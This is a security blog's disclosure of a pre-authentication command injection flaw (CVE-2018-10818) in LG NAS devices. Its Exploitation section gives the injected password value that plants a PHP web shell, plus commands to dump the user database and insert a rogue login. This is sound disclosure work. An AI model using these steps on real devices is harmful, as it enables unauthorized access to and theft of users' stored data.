The listings featured on this site are from companies from which this site receives compensation. This influences: Appearance, order, and manner in which these listings are presented.
Our videos have over 5 million views on Youtube! Visit our channel now »
Disclosure:
Professional Reviews

vpnMentor contains reviews that are written by our community reviewers. These take into consideration the reviewers’ independent and professional examination of the products/services.

Ownership

vpnMentor was established in 2014 as an independent site reviewing VPN services and covering privacy-related stories. Today, our team of hundreds of cybersecurity researchers, writers, and editors continues to help readers fight for their online freedom in partnership with Kape Technologies PLC, which also owns the following products: ExpressVPN, CyberGhost, ZenMate, Private Internet Access, and Intego, which may be reviewed on this website.

Affiliate Commissions Advertising

vpnMentor contains reviews that follow the strict reviewing standards, including ethical standards, that we have adopted. Such standards require that each review will take into consideration the independent, honest and professional examination of the reviewer. That being said, we may earn a commission when a user completes an action using our links, at no additional cost to them. On listicle pages, we rank vendors based on a system that prioritizes the reviewer’s examination of each service, but also considers feedback received from our readers and our commercial agreements with providers.

Reviews Guidelines

The reviews published on vpnMentor are written by community reviewers that examine the products according to our strict reviewing standards. Such standards ensure that each review prioritizes the independent, professional and honest examination of the reviewer, and takes into account the technical capabilities and qualities of the product together with its commercial value for users. The rankings we publish may also take into consideration the affiliate commissions we earn for purchases through links on our website.

Critical Vulnerability Found in Majority of LG NAS Devices

Critical Vulnerability Found in Majority of LG NAS Devices

Author Image Sarit Newman
Sarit Newman Updated on 20th July 2023 Internet Security Researcher
Table of Contents

Here at vpnMentor, we are concerned about your security and privacy. Our special team of hackers & researchers roam the internet to find security issues in sensitive products. We found this remote command execution vulnerability in the majority of LG NAS devices. Read more to find out how we exploited this vulnerability and what you can do about it.

Overview

We carried out an exhaustive evaluation on an LG NAS device. This gadget is a storage unit linked to a network, exclusively accessible to authorized users. It functions similarly to a private cloud but is more cost-effective, easy to manage, and provides total control. Nonetheless, we managed to uncover a technique to breach the system using a pre-authenticated remote command injection vulnerability (CVE-2018-10818). This exploit potentially grants us the ability to perform an array of actions, such as accessing and manipulating user data and content.

Exploitation

The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices.

You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter (you have to use an interceptor like burp). We can simply trigger this bug by adding to it. To add a new user, we can simply write a persistent shell called c.php by using:
;echo “” > /tmp/x2;sudo mv /tmp/x2 /var/www/c.php
Entering it as a password exploits the vulnerability.

Then, by passing the following command, we can “dump” the users:
echo “.dump user” | sqlite3 /etc/nas/db/share.db
Dumping means reading all database data. We dump the database so we can see the users’ usernames and passwords. This also lets us add our own.

To add a new user into the database, we need to generate a valid MD5. We can use the included MD5 tool to create a hash with the username “test” and the password “1234.”
sudo nas-common md5 1234
Once we have a valid password and username, we can add it to the database with the following:
INSERT INTO “user” VALUES(‘test’,’md5_hash’,’Vuln Test’,’test@localhost’,’’);
After this is complete, we can log in to the LG Network Storage with the username test and the password 1234.

This gives us access to the system as an authorized user. From here we can access any data or classified files that are stored on the LAS device.

Recommendations

  • Be aware that LAS devices can be hacked and exploited.
  • Contact LG and let them know about this vulnerability and demand they fix it.
  • Warn your friends on facebook (here's a link), or twitter (click to tweet)

About the Author

Sarit is an experienced internet security writer who believes everyone has the right to online privacy.

Did you like this article? Rate it!
I hated it! I don't really like it It was ok Pretty good! Loved it!
out of 10 - Voted by users
Thank you for your feedback